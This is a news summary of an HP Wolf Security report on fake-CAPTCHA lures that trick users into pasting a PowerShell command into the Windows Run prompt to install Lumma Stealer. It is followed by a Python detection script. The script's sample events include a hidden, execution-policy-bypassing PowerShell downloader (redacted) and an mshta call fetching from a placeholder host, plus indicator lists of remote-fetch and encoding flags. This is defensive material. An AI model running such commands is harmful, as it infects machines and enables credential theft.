Cybercriminals are exploiting users’ trust in familiar verification tools like CAPTCHAs to trick them into infecting their own systems, according to HP Wolf Security’s latest Threat Insights Report.

The report highlights a rise in social engineering campaigns built around a fake CAPTCHA page where users are lured into completing bogus verification steps, exploiting what HP terms “click tolerance”, a habit of blindly following prompts due to frequent exposure to login and security checks.

Victims are directed to attacker-controlled websites where clicking “I’m not a robot” secretly copies a malicious PowerShell command to their clipboard. They are then instructed to open the Windows Run prompt, paste the code, and execute it, thereby unknowingly launching a malware infection themselves.

The primary payload, Lumma Stealer, is a powerful information-stealing tool capable of grabbing credentials and crypto wallets. The malware is hidden in a disguised ZIP archive and deployed using DLL sideloading to avoid detection.

HP reports that these campaigns often use reputable cloud services to host the malicious content, helping them bypass web filters and email gateways. Victims are typically drawn in via search engine hijacking, ads, or compromised websites.

To stay protected, businesses should disable clipboard sharing and restrict access to the Windows Run command where possible. Regular training can also help staff recognise and resist deceptive prompts.
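Added example, not part of the HP report: the detection side of that advice. A command pasted into the Run prompt is executed by explorer.exe, so a script interpreter whose parent is explorer.exe, carrying flags typical of a pasted one-liner, is the simplest telemetry signal for this chain. The process-creation records below are constructed Sysmon-style samples, and their field layout is an assumption.

```python
import ntpath

# Constructed Sysmon-style process-creation records (not real telemetry), written as
# "field=value" pairs separated by "|". The first and fourth mimic a Run-prompt paste
# of the kind described above; the other two are benign activity for contrast.
SAMPLE_EVENTS = [
    'ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    '|CommandLine=powershell -w hidden -NoProfile -ep bypass -c "<redacted downloader>"',
    'ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe',
    'ParentImage=C:\\Program Files\\Git\\git-bash.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    '|CommandLine=powershell -NoProfile -File .\\build.ps1',
    'ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe'
    '|CommandLine=mshta https://cdn.example.invalid/verify',
]

# Interpreters a user can start straight from Win+R; a CAPTCHA-lure paste lands in one of these.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line fragments typical of a pasted one-liner: hide the window, relax policy, fetch remotely.
INDICATORS = {
    "hidden window": ("-w hidden", "-windowstyle hidden"),
    "encoded command": (" -enc ", " -e ", "-encodedcommand"),
    "policy bypass": ("-ep bypass", "-executionpolicy bypass"),
    "remote fetch": ("http://", "https://", "iwr ", "invoke-webrequest", "irm ", "invoke-restmethod"),
}

def parse_event(line):
    """Split 'k=v|k=v' into a dict; split on the first '=' only, CommandLine may contain more."""
    return dict(field.split("=", 1) for field in line.split("|"))

def classify(event):
    """Return (is_suspicious, reasons) for one process-creation event."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
        return False, []
    reasons = ["script host spawned by explorer.exe (Run prompt or shell)"]
    cmd = " " + event.get("CommandLine", "").lower() + " "   # pad so ' -e ' matches at the edges
    reasons += [name for name, frags in INDICATORS.items() if any(f in cmd for f in frags)]
    return True, reasons

def find_clickfix_candidates(lines):
    """Events worth an analyst's attention, each with the reasons it matched."""
    hits = []
    for line in lines:
        event = parse_event(line)
        suspicious, reasons = classify(event)
        if suspicious:
            hits.append((event["CommandLine"], reasons))
    return hits

if __name__ == "__main__":
    for cmd, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"ALERT: {cmd}\n    -> {', '.join(reasons)}")
```

The explorer.exe parent check on its own also fires for legitimate users who open PowerShell from Win+R, so the indicator list is what turns a noisy rule into an alert worth triaging.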